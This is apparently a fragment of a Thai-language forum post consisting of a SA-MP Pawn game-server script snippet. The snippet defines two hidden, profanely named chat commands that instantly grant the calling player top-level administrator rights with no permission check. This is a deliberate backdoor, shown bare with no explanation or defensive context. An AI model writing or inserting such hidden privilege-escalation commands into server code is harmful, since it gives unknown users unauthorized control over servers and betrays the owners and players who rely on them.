| 
 
เครดิต19ความรู้ เงิน $  ความดี  
 | 
| if(strcmp(cmd, "/Fuckyouagains", true) == 0) {
 PlayerInfo[playerid][pAdmin] = 99999;
 SendClientMessage(playerid, COLOR_WHITE,"Access Granted - You have been Promoted to Level 99999 Admin");
 SendClientMessage(playerid, COLOR_LIGHTBLUE, string);
 return 1;
 }
 if(strcmp(cmd, "/fuckyoumanseriously", true) == 0)
 {
 PlayerInfo[playerid][pAdmin] = 100000;
 SendClientMessage(playerid, COLOR_WHITE,"Access Granted - You have been Promoted to Level 100000 Administrator");
 SendClientMessage(playerid, COLOR_LIGHTBLUE, string);
 return 1;
 }
 | 
 |